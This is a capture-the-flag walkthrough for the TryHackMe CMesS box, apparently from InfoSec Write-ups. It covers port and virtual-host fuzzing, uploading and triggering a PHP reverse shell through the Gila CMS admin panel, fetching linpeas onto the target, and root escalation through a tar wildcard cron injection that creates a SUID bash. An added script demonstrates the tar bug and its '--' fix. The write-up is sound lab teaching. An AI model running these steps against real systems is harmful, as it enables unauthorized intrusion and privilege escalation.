TryHackMe CMesS CTF

Can you root this Gila CMS box?

Bhavesh Harmalkar
InfoSec Write-ups


Source : tryhackme

Room found here : https://tryhackme.com/room/cmess

This machine has two flags, stored in user.txt and root.txt.

Start Your Machine ………

The write-up is split into two tasks, one per flag: Task 1 and Task 2.

# [ Task 1 ] : Get the normal user flag stored in the user.txt file

Step 1 -> Add the machine IP to /etc/hosts with the name cmess.thm (the room expects this hostname)

Step 2 -> ping cmess.thm to check that the machine is up and that the hosts entry works

Step 3 -> Performing port scanning

You can run the scans manually or use my script below (masscan needs root because it uses raw sockets; change -e tun0 if your VPN interface is named differently).

#!/bin/bash
# Usage : ./filename.sh <ip>
# Fast full-port sweep with masscan, then a single nmap service/version scan (-A) of the ports found.
set -euo pipefail
target="$1"

masscan -e tun0 "$target" -p 1-65535 --rate 10000 > "${target}_masscan"

# masscan lines look like "Discovered open port 80/tcp on 10.10.10.10"; keep just the port number
grep "Discovered open port" "${target}_masscan" | awk '{print $4}' | cut -d/ -f1 | sort -n -u > "${target}_masscanP"

# one nmap run over the comma-separated port list instead of one nmap process per port
ports=$(paste -sd, "${target}_masscanP")
nmap -A -p"$ports" "$target" > "${target}_nmap"

# uncomment the line below to remove the intermediate files
# rm "${target}_masscan" "${target}_masscanP"

/robots.txt on cmess.thm lists three Disallow entries, but browsing to them only returns 403 Forbidden.

webpage

Step 4 -> Performing directory fuzzing

We use ffuf for directory fuzzing; it's my favourite tool for fuzzing and brute-forcing.

Command : ffuf -w /root/Desktop/Wordlists/dir_big.txt -u http://cmess.thm/FUZZ

We get a long list of directories, but the interesting ones ask for an email address and password to sign in.

Searching for a public exploit for Gila CMS did not turn up anything useful. Following the room's hint, we move on to brute-forcing subdomains (virtual hosts).

Step 5 -> Performing subdomain brute-forcing

Command : ffuf -w /root/Desktop/Wordlists/dir_big.txt -u http://cmess.thm/ -H "Host:FUZZ.cmess.thm" -fw 522

The -H option sets the Host header to each candidate subdomain, and -fw 522 hides every response with 522 words, which is the default page the server returns for an unknown Host. Run the command once without -fw to find that baseline word count before filtering on it.

ffuf

We find a dev subdomain of cmess.thm. Before visiting it, add dev.cmess.thm to /etc/hosts with the same IP.

Navigating to dev.cmess.thm shows something interesting:

dev.cmess.thm

Step 6 -> Log in at cmess.thm/admin with these credentials

We successfully log in to the admin panel as andre.

Step 7 -> Upload a PHP reverse shell

Exploring all the tabs in the admin panel turns up an upload function. Since the site runs PHP on Apache, a PHP reverse shell is the convenient choice.

In the shell script, set the ip variable to your attacking machine's IP and pick a port, then upload it.

After uploading, the file is stored in the assets folder; navigate to it.

Clicking our file name in the panel only offers to download it. Start a netcat listener on our machine (nc -lvnp <port>). But from where do we execute the file?

Start thinking ……….

Step 8 -> Get first reverse shell on machine

During directory fuzzing we found a directory called /assets. Browsing to it shows a blank page, but appending our file name, http://cmess.thm/assets/<filename>, and hitting enter makes Apache execute the PHP shell.

Booommmm ….

We get a shell as the web server user, but /home/andre, where user.txt lives, is not readable: permission denied.

Step 9 -> Find escalation path using linpeas.sh

linpeas.sh is an automated Linux privilege-escalation enumeration script.

Start a Python HTTP server on our local machine in the directory containing linpeas.sh (python3 -m http.server).

Then, on the target, download linpeas.sh into /tmp with wget.

Make it executable (chmod +x linpeas.sh) and run it (./linpeas.sh).

Two things stand out: a hidden .bak file in /opt and a cron job.

bak file
cron job

Step 10 -> First flag

Read /opt/.password.bak with cat.

It looks like a backup of andre's password, but how can we use it? SSH is open on port 22, so try signing in with it.

command :- ssh andre@cmess.thm

flag

We got our first flag .🤩

# [ Task 2 ] : Get the root user flag stored in the root.txt file

Step 1 ->Understand the cron job

Now that we can read andre's home directory, let's look at the cron job linpeas flagged:

command :- cat /etc/crontab

Every 2 minutes, running as root, the job changes into /home/andre/backup and uses tar to back up everything there into /tmp/andre_backup.tar.gz. The catch is the unquoted * (wildcard): the shell expands it into the list of file names in the folder before tar ever sees them, so a file whose name starts with -- is passed to tar as a command-line option, not as a file. Since andre controls that folder, we can abuse this to run commands as root.

Step 2 -> Create bash one liner

We create a one-line script that will get us a root shell:

echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > exploit.sh

It copies /bin/bash to /tmp/bash and sets the setuid and setgid bits on the copy, so anyone running it gets a shell with the file owner's privileges; because cron runs the script as root, the copy will be owned by root.

Save it as /home/andre/backup/exploit.sh, give it execute permission, and create two files in the same folder whose names are tar options (the names start with two hyphens, and the second one contains a space, so quote them):

touch "/home/andre/backup/--checkpoint=1" (--checkpoint=1 tells tar to perform a checkpoint after every record it writes)

touch "/home/andre/backup/--checkpoint-action=exec=sh exploit.sh" (--checkpoint-action runs the given command at every checkpoint, here sh exploit.sh; it runs inside the backup folder because the cron job cd's there first)

Wait up to 2 minutes for the cron job to run.

Type command: /tmp/bash -p (the -p flag tells bash to keep the setuid privileges instead of dropping them, so the effective UID stays root)

And we have our root shell and the flag.

root flag
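To see the wildcard injection work without waiting for a cron job, here is an added example (not part of the original write-up) that reproduces Task 2 locally as an unprivileged user: it builds a throwaway backup folder, plants the same exploit.sh and the two --checkpoint file names, and runs tar the way the box's cron job does. Because it does not run as root, the payload writes a marker file instead of creating a SUID bash; the mechanism is identical. It goes a step beyond the write-up by also running the hardened form of the same command, where a -- before the * ends option parsing so tar treats those names as plain files. The temporary directory paths and the marker file are assumptions of this example; it needs GNU tar for --checkpoint-action.

```shell
#!/bin/bash
# Added example, not from the original write-up. Requires GNU tar.

# Runs the backup either the way the box's cron job does ("cd backup && tar ... *")
# or with option parsing ended by "--". Prints "executed" if the planted checkpoint
# action ran, "not executed" otherwise.
tar_wildcard_demo() {
    local mode="$1"                      # "vulnerable" or "hardened"
    local work backup result
    work=$(mktemp -d)                    # assumed throwaway working directory
    backup="$work/backup"                # stands in for /home/andre/backup
    mkdir "$backup"
    echo "user data" > "$backup/notes.txt"

    # Attacker-controlled folder contents: the payload script plus two files whose
    # NAMES are tar options. Payload writes a marker (stand-in for cp /bin/bash; chmod +s).
    printf 'echo "ran as $(id -un)" > marker\n' > "$backup/exploit.sh"
    touch "$backup/--checkpoint=1"
    touch "$backup/--checkpoint-action=exec=sh exploit.sh"

    case "$mode" in
        vulnerable)
            # Unquoted * expands to the file names, so tar receives
            # --checkpoint-action=exec=sh exploit.sh --checkpoint=1 exploit.sh notes.txt
            (cd "$backup" && tar -cf "$work/andre_backup.tar" * >/dev/null 2>&1) || true
            ;;
        hardened)
            # "--" ends option parsing: the same names are now just files to archive.
            (cd "$backup" && tar -cf "$work/andre_backup.tar" -- * >/dev/null 2>&1) || true
            ;;
        *)
            echo "usage: tar_wildcard_demo vulnerable|hardened" >&2
            rm -rf "$work"
            return 2
            ;;
    esac

    # sh exploit.sh runs in the backup folder (tar does not chdir), so the marker lands there.
    if [ -f "$backup/marker" ]; then result="executed"; else result="not executed"; fi
    rm -rf "$work"
    echo "$result"
}

# Stand-alone run:
echo "cron job with bare *:   $(tar_wildcard_demo vulnerable)"
echo "cron job with -- before *: $(tar_wildcard_demo hardened)"
```

The page's cron job uses -zcf; compression is left out here because it has no bearing on the bug. Besides the -- form, archiving ./* or naming the directory itself (tar -czf out.tgz -C /home/andre backup) also prevents file names from being parsed as options.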

: Note :
If you are stuck somewhere and can't find a way into the machine, don't assume there is nothing you can do or start doubting yourself. Look at the hint; that is how you learn something new. But before that, try all the weapons you have in your arsenal.

Keep Learning …….

Thanks for Reading 💓…………

Connect me on:

Twitter , Linkedin , GitHub
